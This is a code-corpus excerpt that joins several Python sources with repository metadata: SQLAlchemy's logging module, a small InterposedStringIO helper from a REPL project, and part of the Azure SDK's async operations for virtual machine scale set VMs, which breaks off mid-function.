    When ``True``, enable log output for this element.

    This has the effect of setting the Python logging level for the namespace
    of this element's class and object reference. A value of boolean ``True``
    indicates that the loglevel ``logging.INFO`` will be set for the logger,
    whereas the string value ``debug`` will set the loglevel to
    ``logging.DEBUG``.
    """

    @overload
    def __get__(
        self, instance: Literal[None], owner: Type[Identified]
    ) -> echo_property:
        ...

    @overload
    def __get__(
        self, instance: Identified, owner: Type[Identified]
    ) -> _EchoFlagType:
        ...

    def __get__(
        self, instance: Optional[Identified], owner: Type[Identified]
    ) -> Union[echo_property, _EchoFlagType]:
        # Class-level access returns the descriptor itself; instance access
        # returns the stored echo flag.
        if instance is None:
            return self
        else:
            return instance._echo

    def __set__(self, instance: Identified, value: _EchoFlagType) -> None:
        # Assignment rebuilds the instance's logger so the new echo flag
        # takes effect immediately.
        instance_logger(instance, echoflag=value)
| 29.565068
| 103
| 0.654697
|
from __future__ import annotations
import logging
import sys
from typing import Any
from typing import Optional
from typing import overload
from typing import Set
from typing import Type
from typing import TypeVar
from typing import Union
from .util import py311
from .util import py38
from .util.typing import Literal
if py38:
STACKLEVEL = True
STACKLEVEL_OFFSET = 2 if py311 else 1
else:
STACKLEVEL = False
STACKLEVEL_OFFSET = 0
_IT = TypeVar("_IT", bound="Identified")
_EchoFlagType = Union[None, bool, Literal["debug"]]
# logging being enabled for 'sqlalchemy'.
rootlogger = logging.getLogger("sqlalchemy")
if rootlogger.level == logging.NOTSET:
rootlogger.setLevel(logging.WARN)
def _add_default_handler(logger: logging.Logger) -> None:
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter("%(asctime)s %(levelname)s %(name)s %(message)s")
)
logger.addHandler(handler)
_logged_classes: Set[Type["Identified"]] = set()
def _qual_logger_name_for_cls(cls: Type["Identified"]) -> str:
return (
getattr(cls, "_sqla_logger_namespace", None)
or cls.__module__ + "." + cls.__name__
)
def class_logger(cls: Type[_IT]) -> Type[_IT]:
logger = logging.getLogger(_qual_logger_name_for_cls(cls))
cls._should_log_debug = lambda self: logger.isEnabledFor( # type: ignore[assignment] # noqa: E501
logging.DEBUG
)
cls._should_log_info = lambda self: logger.isEnabledFor( # type: ignore[assignment] # noqa: E501
logging.INFO
)
cls.logger = logger
_logged_classes.add(cls)
return cls
_IdentifiedLoggerType = Union[logging.Logger, "InstanceLogger"]
class Identified:
__slots__ = ()
logging_name: Optional[str] = None
logger: _IdentifiedLoggerType
_echo: _EchoFlagType
def _should_log_debug(self) -> bool:
return self.logger.isEnabledFor(logging.DEBUG)
def _should_log_info(self) -> bool:
return self.logger.isEnabledFor(logging.INFO)
class InstanceLogger:
# Map echo settings to logger levels
_echo_map = {
None: logging.NOTSET,
False: logging.NOTSET,
True: logging.INFO,
"debug": logging.DEBUG,
}
_echo: _EchoFlagType
__slots__ = ("echo", "logger")
def __init__(self, echo: _EchoFlagType, name: str):
self.echo = echo
self.logger = logging.getLogger(name)
# if echo flag is enabled and no handlers,
# add a handler to the list
if self._echo_map[echo] <= logging.INFO and not self.logger.handlers:
_add_default_handler(self.logger)
#
# Boilerplate convenience methods
#
def debug(self, msg: str, *args: Any, **kwargs: Any) -> None:
self.log(logging.DEBUG, msg, *args, **kwargs)
def info(self, msg: str, *args: Any, **kwargs: Any) -> None:
self.log(logging.INFO, msg, *args, **kwargs)
def warning(self, msg: str, *args: Any, **kwargs: Any) -> None:
self.log(logging.WARNING, msg, *args, **kwargs)
warn = warning
def error(self, msg: str, *args: Any, **kwargs: Any) -> None:
self.log(logging.ERROR, msg, *args, **kwargs)
def exception(self, msg: str, *args: Any, **kwargs: Any) -> None:
kwargs["exc_info"] = 1
self.log(logging.ERROR, msg, *args, **kwargs)
def critical(self, msg: str, *args: Any, **kwargs: Any) -> None:
self.log(logging.CRITICAL, msg, *args, **kwargs)
def log(self, level: int, msg: str, *args: Any, **kwargs: Any) -> None:
# inline the logic from isEnabledFor(),
# getEffectiveLevel(), to avoid overhead.
if self.logger.manager.disable >= level:
return
selected_level = self._echo_map[self.echo]
if selected_level == logging.NOTSET:
selected_level = self.logger.getEffectiveLevel()
if level >= selected_level:
if STACKLEVEL:
kwargs["stacklevel"] = (
kwargs.get("stacklevel", 1) + STACKLEVEL_OFFSET
)
self.logger._log(level, msg, args, **kwargs)
def isEnabledFor(self, level: int) -> bool:
if self.logger.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def getEffectiveLevel(self) -> int:
level = self._echo_map[self.echo]
if level == logging.NOTSET:
level = self.logger.getEffectiveLevel()
return level
def instance_logger(
instance: Identified, echoflag: _EchoFlagType = None
) -> None:
if instance.logging_name:
name = "%s.%s" % (
_qual_logger_name_for_cls(instance.__class__),
instance.logging_name,
)
else:
name = _qual_logger_name_for_cls(instance.__class__)
instance._echo = echoflag # type: ignore
logger: Union[logging.Logger, InstanceLogger]
if echoflag in (False, None):
# if no echo setting or False, return a Logger directly,
# avoiding overhead of filtering
logger = logging.getLogger(name)
else:
# if a specified echo flag, return an EchoLogger,
# which checks the flag, overrides normal log
# levels by calling logger._log()
logger = InstanceLogger(echoflag, name)
instance.logger = logger # type: ignore
class echo_property:
__doc__ = """\
When ``True``, enable log output for this element.
This has the effect of setting the Python logging level for the namespace
of this element's class and object reference. A value of boolean ``True``
indicates that the loglevel ``logging.INFO`` will be set for the logger,
whereas the string value ``debug`` will set the loglevel to
``logging.DEBUG``.
"""
@overload
def __get__(
self, instance: Literal[None], owner: Type[Identified]
) -> echo_property:
...
@overload
def __get__(
self, instance: Identified, owner: Type[Identified]
) -> _EchoFlagType:
...
def __get__(
self, instance: Optional[Identified], owner: Type[Identified]
) -> Union[echo_property, _EchoFlagType]:
if instance is None:
return self
else:
return instance._echo
def __set__(self, instance: Identified, value: _EchoFlagType) -> None:
instance_logger(instance, echoflag=value)
| true
| true
|
f7050bd0c8ce3ae371a054a6377ad40107a35adf
| 602
|
py
|
Python
|
repl/InterposedIO.py
|
freeman-lab/pyrepl
|
d7312778e1f6d5afddbe51d1ae6f604fcf9fc73f
|
[
"MIT"
] | 9
|
2018-03-17T01:59:08.000Z
|
2021-07-30T13:36:46.000Z
|
repl/InterposedIO.py
|
chanzuckerberg/pyrepl
|
c3c366a0c7178a0c00a839b489bfcd0929e220d7
|
[
"MIT"
] | null | null | null |
repl/InterposedIO.py
|
chanzuckerberg/pyrepl
|
c3c366a0c7178a0c00a839b489bfcd0929e220d7
|
[
"MIT"
] | null | null | null |
"""
Stream IO interposition
"""
import io
class InterposedStringIO(io.StringIO):
    """A StringIO that hands its buffered text to a callback on flush.

    Parameters:
        newline: passed through to :class:`io.StringIO`.
        line_buffering: when true, any write containing a newline or
            carriage return triggers an immediate flush.
        onflush: optional callable invoked with the accumulated text each
            time the stream is flushed; the internal buffer is emptied first.
    """

    def __init__(self, newline="\n", line_buffering=False, onflush=None):
        super().__init__(newline=newline)
        self._line_buffering = line_buffering
        self._onflush = onflush

    def flush(self):
        """Drain the buffer and pass its contents to the onflush callback."""
        s = self.getvalue()
        # Bug fix: the original called seek(io.SEEK_SET, 0), i.e. with the
        # offset and whence arguments swapped; it only worked by accident
        # because io.SEEK_SET equals 0.  seek(0) is the intended call.
        self.seek(0)
        self.truncate()
        if self._onflush:
            self._onflush(s)

    def write(self, s):
        """Write *s*, auto-flushing on newline when line-buffered.

        Returns the number of characters written, per the io.TextIOBase
        contract (the original implementation returned None).
        """
        count = super().write(s)
        if self._line_buffering and ('\n' in s or '\r' in s):
            self.flush()
        return count
| 25.083333
| 76
| 0.571429
|
import io
class InterposedStringIO(io.StringIO):
def __init__(self, newline="\n", line_buffering = False, onflush=None):
super().__init__(newline=newline)
self._line_buffering = line_buffering
self._onflush = onflush
def flush(self):
s = self.getvalue()
self.seek(io.SEEK_SET, 0)
self.truncate()
if self._onflush:
self._onflush(s)
def write(self, s):
super().write(s)
if self._line_buffering and ('\n' in s or '\r' in s):
self.flush()
| true
| true
|
f7050c7044587c7a03a7e83f1453f954e296f2ad
| 49,770
|
py
|
Python
|
sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2017_03_30/aio/operations/_virtual_machine_scale_set_vms_operations.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2021-09-07T18:39:05.000Z
|
2021-09-07T18:39:05.000Z
|
sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2017_03_30/aio/operations/_virtual_machine_scale_set_vms_operations.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | null | null | null |
sdk/compute/azure-mgmt-compute/azure/mgmt/compute/v2017_03_30/aio/operations/_virtual_machine_scale_set_vms_operations.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2022-03-04T06:21:56.000Z
|
2022-03-04T06:21:56.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._virtual_machine_scale_set_vms_operations import build_deallocate_request_initial, build_delete_request_initial, build_get_instance_view_request, build_get_request, build_list_request, build_power_off_request_initial, build_reimage_all_request_initial, build_reimage_request_initial, build_restart_request_initial, build_start_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualMachineScaleSetVMsOperations:
"""VirtualMachineScaleSetVMsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2017_03_30.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
    def __init__(self, client, config, serializer, deserializer) -> None:
        # Standard AutoRest operation-group wiring: hold references to the
        # shared pipeline client, client configuration and (de)serializers.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    async def _reimage_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        # Initial (non-polling) request of the reimage long-running
        # operation: issues the POST and returns the deserialized status
        # body on 200, or None on 202 (accepted, result pending).  Polling
        # to completion is handled by begin_reimage().
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.OperationStatusResponse"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # allow callers to extend/override the status-code -> exception map
        error_map.update(kwargs.pop('error_map', {}))

        request = build_reimage_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._reimage_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 202]:
            # translate mapped codes into typed exceptions, then raise a
            # generic ARM-formatted error for anything else
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)

        if cls:
            # custom response hook supplied via the ``cls`` kwarg
            return cls(pipeline_response, deserialized, {})

        return deserialized

    _reimage_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'}  # type: ignore
@distributed_trace_async
async def begin_reimage(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Reimages (upgrade the operating system) a specific virtual machine in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reimage_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reimage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'} # type: ignore
async def _reimage_all_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_reimage_all_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._reimage_all_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reimage_all_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'} # type: ignore
@distributed_trace_async
async def begin_reimage_all(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Allows you to re-image all the disks ( including data disks ) in the a VM scale set instance.
This operation is only supported for managed disks.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reimage_all_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reimage_all.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'} # type: ignore
async def _deallocate_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_deallocate_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._deallocate_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_deallocate_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'} # type: ignore
@distributed_trace_async
async def begin_deallocate(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Deallocates a specific virtual machine in a VM scale set. Shuts down the virtual machine and
releases the compute resources it uses. You are not billed for the compute resources of this
virtual machine once it is deallocated.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._deallocate_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_deallocate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'} # type: ignore
    async def _delete_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        # Sends the initial DELETE request of the long-running delete operation.
        # Returns a deserialized OperationStatusResponse on 200; None on 202/204
        # (accepted / already gone) — the poller drives the rest of the LRO.
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.OperationStatusResponse"]]
        # Map auth/not-found/conflict statuses to their specific azure-core exceptions;
        # callers may extend/override via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_delete_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._delete_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            # Custom response hook: let the caller-supplied callable shape the return value.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'}  # type: ignore
    @distributed_trace_async
    async def begin_delete(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Deletes a virtual machine from a VM scale set.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param vm_scale_set_name: The name of the VM scale set.
        :type vm_scale_set_name: str
        :param instance_id: The instance ID of the virtual machine.
        :type instance_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
         result of cls(response)
        :rtype:
         ~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # 'polling' is True (default AsyncARMPolling), False (no polling), or a custom method.
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.OperationStatusResponse"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Without a continuation token, kick off a fresh LRO via the initial request;
        # with one, resume a previously started operation instead.
        if cont_token is None:
            raw_result = await self._delete_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,  # keep the raw pipeline response for the poller
                **kwargs
            )
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal LRO response into the operation-status model.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        # NOTE(review): unlike the other LROs in this client, no lro_options
        # ('final-state-via') are passed here — presumably per the service spec;
        # confirm against the swagger before changing.
        if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'}  # type: ignore
    @distributed_trace_async
    async def get(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> "_models.VirtualMachineScaleSetVM":
        """Gets a virtual machine from a VM scale set.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param vm_scale_set_name: The name of the VM scale set.
        :type vm_scale_set_name: str
        :param instance_id: The instance ID of the virtual machine.
        :type instance_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: VirtualMachineScaleSetVM, or the result of cls(response)
        :rtype: ~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVM
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VirtualMachineScaleSetVM"]
        # Specific exceptions for auth/not-found/conflict; extensible via 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_get_request(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self.get.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # Simple synchronous GET: only 200 is a success for this endpoint.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('VirtualMachineScaleSetVM', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'}  # type: ignore
    @distributed_trace_async
    async def get_instance_view(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> "_models.VirtualMachineScaleSetVMInstanceView":
        """Gets the status of a virtual machine from a VM scale set.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param vm_scale_set_name: The name of the VM scale set.
        :type vm_scale_set_name: str
        :param instance_id: The instance ID of the virtual machine.
        :type instance_id: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: VirtualMachineScaleSetVMInstanceView, or the result of cls(response)
        :rtype: ~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVMInstanceView
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VirtualMachineScaleSetVMInstanceView"]
        # Specific exceptions for auth/not-found/conflict; extensible via 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_get_instance_view_request(
